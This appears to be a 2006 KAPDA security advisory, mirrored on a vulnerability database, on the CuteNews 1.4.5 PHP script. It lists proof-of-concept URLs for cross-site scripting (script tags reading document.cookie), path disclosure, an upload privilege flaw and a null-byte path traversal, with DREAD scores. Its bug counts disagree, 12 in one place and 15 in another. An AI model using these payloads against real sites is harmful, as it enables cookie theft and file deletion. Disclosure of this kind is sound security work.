Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15185
HistoryNov 22, 2006 - 12:00 a.m.

[KAPDA]::Security analysis of cutenews 1.4.5

2006-11-2200:00:00
vulners.com
21
JSON

Product: cutenews 1.4.5
Vendor: http://cutephp.com

The Results through security analysis of cutenews
1.4.5
[provided by KAPDA.ir]

Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES

Statistical Results from 'security Audit' perspective

TOTAL UNIQUE BUGS (12)

Number of integration errors: 3
Type: Path Disclosure , Authorization error
(privileges escalation), XSS
PoC:index.php?debug
DREAD Severity: 7 (Low)
PoC:index.php?mod=images&subaction=upload
DREAD Severity: 12 (Medium)
PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)

Number of Technical errors: 9
Type: XSS ,Html Injection, Path disclosure, Path
traversal

PoC:show_news.php?KAPDA="><script>alert()</script>
DREAD Severity: 7 (Low)
PoC:index.php?mod=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
DREAD Severity: 8 (Medium)
PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:Story
field:</textarea><script>alert(document.cookie)</script>
DREAD Severity: 12 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&selected_news=)
DREAD Severity: 7 (Low)
PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=…/upimages/ddddd.php%00
DREAD Severity: 10 (Medium)

Number of Logical errors: 0

Statistical Results from 'functional Risk Base'
perspective

Authentication mechanism: passed
Use a policy of least-privileged accounts: passed
Session Management: passed
Cookie Management: passed
Sensitive Data Management: passed
Cryptography:passed
Error handling: Passed But with negligence
Authorization: Passed But with negligence
Configuration Management:Passed But with negligence
PHP Coding Performance: Passed But with negligence
Security by design: Passed But with negligence
Note: using Extract() improperly, leads to several
cross site scripting bugs.
Input/Data validation: Not passed
Auditing and Logging: Not Passed

Statistical Results from 'Security Metrics'
perspective

Number of discovered bugs: 15
Number of reviewed Code Lines: 6000
Bugs per 10KLOC: 25
Vulnerabilities severity average: Low
Number of discovered bugs after stable release: 15
Number of 'Documents' pages relevant to security: 1
Quality of Security support: Moderate

Security Grade at the current version (1.4.5) From
Kapda : B-
Note: All Grades are: A , B+ , B , B- , C+ , C , C- ,
D

Reference: http://www.kapda.ir/advisory-450.html

Sponsored Link

Online degrees - find the right program to advance your career.
Www.nextag.com

JSON